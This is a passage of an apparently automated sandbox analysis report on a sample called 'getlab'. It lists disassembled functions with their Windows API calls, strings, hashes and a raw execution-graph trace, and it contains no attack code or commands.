                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                          • API String ID: 4190037839-2401316094
                                                                          • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                          • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                          • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                          Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                          • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                          • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                          Function 004053B4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                            • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                          • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                          • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                          Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                          • LocalFree.KERNEL32(006CEE88,00000000,00401AB4), ref: 00401A1B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,006CEE88,00000000,00401AB4), ref: 00401A3A
                                                                          • LocalFree.KERNEL32(006CD330,?,00000000,00008000,006CEE88,00000000,00401AB4), ref: 00401A79
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID:
                                                                          • API String ID: 3782394904-0
                                                                          • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                          • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                          • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                          Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                          • ExitProcess.KERNEL32 ref: 00403DE5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000$9@
                                                                          • API String ID: 1220098344-1503883590
                                                                          • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                          • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                          • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                          Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                          • String ID:
                                                                          • API String ID: 262959230-0
                                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                          Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID:
                                                                          • API String ID: 730355536-0
                                                                          • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                          • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                          Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: )q@
                                                                          • API String ID: 3660427363-2284170586
                                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                          Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CommandHandleLineModule
                                                                          • String ID: U1hd.@
                                                                          • API String ID: 2123368496-2904493091
                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                          Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                          Execution Graph

                                                                          Execution Coverage:16%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:4.5%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:69
                                                                          execution_graph 49750 402584 49751 402598 49750->49751 49752 4025ab 49750->49752 49780 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49751->49780 49754 4025c2 RtlEnterCriticalSection 49752->49754 49755 4025cc 49752->49755 49754->49755 49766 4023b4 13 API calls 49755->49766 49756 40259d 49756->49752 49758 4025a1 49756->49758 49759 4025d5 49760 4025d9 49759->49760 49767 402088 49759->49767 49762 402635 49760->49762 49763 40262b RtlLeaveCriticalSection 49760->49763 49763->49762 49764 4025e5 49764->49760 49781 402210 9 API calls 49764->49781 49766->49759 49768 40209c 49767->49768 49769 4020af 49767->49769 49788 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 49768->49788 49770 4020c6 RtlEnterCriticalSection 49769->49770 49772 4020d0 49769->49772 49770->49772 49777 402106 49772->49777 49782 401f94 49772->49782 49773 4020a1 49773->49769 49774 4020a5 49773->49774 49774->49777 49777->49764 49778 4021f1 RtlLeaveCriticalSection 49779 4021fb 49778->49779 49779->49764 49780->49756 49781->49760 49785 401fa4 49782->49785 49783 401fd0 49787 401ff4 49783->49787 49794 401db4 49783->49794 49785->49783 49785->49787 49789 401f0c 49785->49789 49787->49778 49787->49779 49788->49773 49798 40178c 49789->49798 49792 401f29 49792->49785 49795 401e02 49794->49795 49796 401dd2 49794->49796 49795->49796 49821 401d1c 49795->49821 49796->49787 49801 4017a8 49798->49801 49800 4017b2 49817 401678 VirtualAlloc 49800->49817 49801->49800 49803 40180f 49801->49803 49806 401803 49801->49806 49809 4014e4 49801->49809 49818 4013e0 LocalAlloc 49801->49818 49803->49792 49808 401e80 9 API calls 49803->49808 49805 4017be 49805->49803 49819 4015c0 VirtualFree 49806->49819 49808->49792 49810 4014f3 VirtualAlloc 49809->49810 49812 401520 49810->49812 49813 401543 49810->49813 49820 401398 LocalAlloc 49812->49820 49813->49801 49815 40152c 49815->49813 49816 401530 VirtualFree 49815->49816 49816->49813 49817->49805 49818->49801 49819->49803 49820->49815 49822 401d2e 49821->49822 49823 401d51 49822->49823 49824 401d63 49822->49824 49834 401940 49823->49834 49825 401940 3 API calls 49824->49825 49827 401d61 49825->49827 49828 401d79 49827->49828 49844 401bf8 9 API calls 49827->49844 49828->49796 49830 401d88 49831 401da2 49830->49831 49845 401c4c 9 API calls 49830->49845 49846 401454 LocalAlloc 49831->49846 49835 401966 49834->49835 49843 4019bf 49834->49843 49847 40170c 49835->49847 49839 401983 49840 40199a 49839->49840 49852 4015c0 VirtualFree 49839->49852 49840->49843 49853 401454 LocalAlloc 49840->49853 49843->49827 49844->49830 49845->49831 49846->49828 49848 401743 49847->49848 49849 401783 49848->49849 49850 40175d VirtualFree 49848->49850 49851 4013e0 LocalAlloc 49849->49851 49850->49848 49851->49839 49852->49840 49853->49843 53498 40d064 53499 40d06c 53498->53499 53500 40d096 53499->53500 53501 40d09a 53499->53501 53502 40d08f 53499->53502 53504 40d0b0 53501->53504 53505 40d09e 53501->53505 53511 406288 GlobalHandle GlobalUnlock GlobalFree 53502->53511 53512 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 53504->53512 53510 40625c GlobalAlloc GlobalLock 53505->53510 53508 40d0ac 53508->53500 53513 408cac 53508->53513 53510->53508 53511->53500 53512->53508 53514 408cb8 53513->53514 53521 406ddc LoadStringA 53514->53521 53517 403450 4 API calls 53518 408ce9 53517->53518 53519 403400 4 API calls 53518->53519 53520 408cfe 53519->53520 53520->53500 53522 4034e0 4 API calls 53521->53522 53523 406e09 53522->53523 53523->53517 53524 44b4a0 53525 44b4ae 53524->53525 53527 44b4cd 53524->53527 53525->53527 53528 44b384 53525->53528 53529 44b3b7 53528->53529 53539 414ae0 53529->53539 53531 44b3ca 53532 44b3f7 73A1A570 53531->53532 53533 40357c 4 API calls 53531->53533 53543 41a1e0 53532->53543 53533->53532 53536 44b428 53551 44b0b8 53536->53551 53538 44b43c 73A1A480 53538->53527 53540 414aee 53539->53540 53541 4034e0 4 API calls 53540->53541 53542 414afb 53541->53542 53542->53531 53544 41a2a7 53543->53544 53545 41a20b 53543->53545 53546 403400 4 API calls 53544->53546 53548 403520 4 API calls 53545->53548 53547 41a2bf SelectObject 53546->53547 53547->53536 53549 41a263 53548->53549 53550 41a29b CreateFontIndirectA 53549->53550 53550->53544 53552 44b0cf 53551->53552 53553 44b162 53552->53553 53554 44b0e2 53552->53554 53555 44b14b 53552->53555 53553->53538 53554->53553 53557 402648 4 API calls 53554->53557 53556 44b15b DrawTextA 53555->53556 53556->53553 53558 44b0f3 53557->53558 53559 44b111 MultiByteToWideChar DrawTextW 53558->53559 53560 402660 4 API calls 53559->53560 53561 44b143 53560->53561 53561->53538 53562 448720 53563 448755 53562->53563 53564 44874e 53562->53564 53565 448769 53563->53565 53566 448524 7 API calls 53563->53566 53568 403400 4 API calls 53564->53568 53565->53564 53567 403494 4 API calls 53565->53567 53566->53565 53570 448782 53567->53570 53569 4488ff 53568->53569 53571 4037b8 4 API calls 53570->53571 53572 44879e 53571->53572 53573 4037b8 4 API calls 53572->53573 53574 4487ba 53573->53574 53574->53564 53575 4487ce 53574->53575 53576 4037b8 4 API calls 53575->53576 53577 4487e8 53576->53577 53578 431bc8 4 API calls 53577->53578 53579 44880a 53578->53579 53580 431c98 4 API calls 53579->53580 53587 44882a 53579->53587 53580->53579 53581 448880 53594 44232c 53581->53594 53582 448868 53582->53581 53606 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53582->53606 53586 4488b4 GetLastError 53607 4484b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53586->53607 53587->53582 53605 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53587->53605 53589 4488c3 53608 443608 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53589->53608 53591 4488d8 53609 443618 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53591->53609 53593 4488e0 53595 442365 53594->53595 53596 44330a 53594->53596 53597 403400 4 API calls 53595->53597 53598 403400 4 API calls 53596->53598 53599 44236d 53597->53599 53600 44331f 53598->53600 53601 431bc8 4 API calls 53599->53601 53600->53586 53603 442379 53601->53603 53602 4432fa 53602->53586 53603->53602 53610 441a04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53603->53610 53605->53587 53606->53581 53607->53589 53608->53591 53609->53593 53610->53603 53611 4165e4 73A25CF0 53612 42e3e7 SetErrorMode 49854 44138c 49855 441395 49854->49855 49856 4413a3 WriteFile 49854->49856 49855->49856 49857 4413ae 49856->49857 53613 40cee8 53614 40cef5 53613->53614 53615 40cefa 53613->53615 53617 406f38 CloseHandle 53614->53617 53617->53615 49858 490f80 49859 490fba 49858->49859 49860 490fbc 49859->49860 49861 490fc6 49859->49861 50058 409088 MessageBeep 49860->50058 49863 490ffe 49861->49863 49864 490fd5 49861->49864 49869 49100d 49863->49869 49870 491036 49863->49870 49866 446ff0 18 API calls 49864->49866 49868 490fe2 49866->49868 50059 406ba0 49868->50059 49873 446ff0 18 API calls 49869->49873 49879 49106e 49870->49879 49880 491045 49870->49880 49876 49101a 49873->49876 50067 406bf0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49876->50067 49886 49107d 49879->49886 49887 491096 49879->49887 49882 446ff0 18 API calls 49880->49882 49881 491025 50068 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49881->50068 49883 491052 49882->49883 50069 406c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49883->50069 50071 407270 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49886->50071 49892 4910ca 49887->49892 49893 4910a5 49887->49893 49888 49105d 50070 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49888->50070 49891 491085 50072 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49891->50072 49898 4910d9 49892->49898 49899 491102 49892->49899 49895 446ff0 18 API calls 49893->49895 49896 4910b2 49895->49896 50073 407298 49896->50073 49901 446ff0 18 API calls 49898->49901 49904 49113a 49899->49904 49905 491111 49899->49905 49900 4910ba 50076 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49900->50076 49903 4910e6 49901->49903 50077 42c7fc 49903->50077 49912 491149 49904->49912 49913 491186 49904->49913 49907 446ff0 18 API calls 49905->49907 49909 49111e 49907->49909 50087 4071e8 8 API calls 49909->50087 49915 446ff0 18 API calls 49912->49915 49919 4911be 49913->49919 49920 491195 49913->49920 49914 491129 50088 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49914->50088 49916 491158 49915->49916 49918 446ff0 18 API calls 49916->49918 49921 491169 49918->49921 49926 4911cd 49919->49926 49927 4911f6 49919->49927 49922 446ff0 18 API calls 49920->49922 50089 490c84 8 API calls 49921->50089 49924 4911a2 49922->49924 50091 42c89c 49924->50091 49925 491175 50090 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49925->50090 49930 446ff0 18 API calls 49926->49930 49935 49122e 49927->49935 49936 491205 49927->49936 49932 4911da 49930->49932 50097 42c8c4 49932->50097 49942 49123d 49935->49942 49943 491266 49935->49943 49938 446ff0 18 API calls 49936->49938 49939 491212 49938->49939 50106 42c8f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49939->50106 49945 446ff0 18 API calls 49942->49945 49948 49129e 49943->49948 49949 491275 49943->49949 49944 49121d 50107 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49944->50107 49947 49124a 49945->49947 50108 42c924 49947->50108 49956 4912ea 49948->49956 49957 4912ad 49948->49957 49951 446ff0 18 API calls 49949->49951 49953 491282 49951->49953 50114 42c94c 49953->50114 49962 4912f9 49956->49962 49963 49133c 49956->49963 49959 446ff0 18 API calls 49957->49959 49961 4912bc 49959->49961 49964 446ff0 18 API calls 49961->49964 49966 446ff0 18 API calls 49962->49966 49970 49134b 49963->49970 49971 4913af 49963->49971 49965 4912cd 49964->49965 50120 42c4f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49965->50120 49968 49130c 49966->49968 49972 446ff0 18 API calls 49968->49972 49969 4912d9 50121 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49969->50121 50046 446ff0 49970->50046 49979 4913ee 49971->49979 49980 4913be 49971->49980 49975 49131d 49972->49975 50122 490e7c 12 API calls 49975->50122 49976 490fc1 50153 403420 49976->50153 49989 49142d 49979->49989 49990 4913fd 49979->49990 49983 446ff0 18 API calls 49980->49983 49982 49132b 50123 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49982->50123 49986 4913cb 49983->49986 49984 491366 49987 49136a 49984->49987 49988 49139f 49984->49988 50126 4528dc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 49986->50126 49993 446ff0 18 API calls 49987->49993 50125 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49988->50125 50001 49146c 49989->50001 50002 49143c 49989->50002 49994 446ff0 18 API calls 49990->49994 49996 491379 49993->49996 49997 49140a 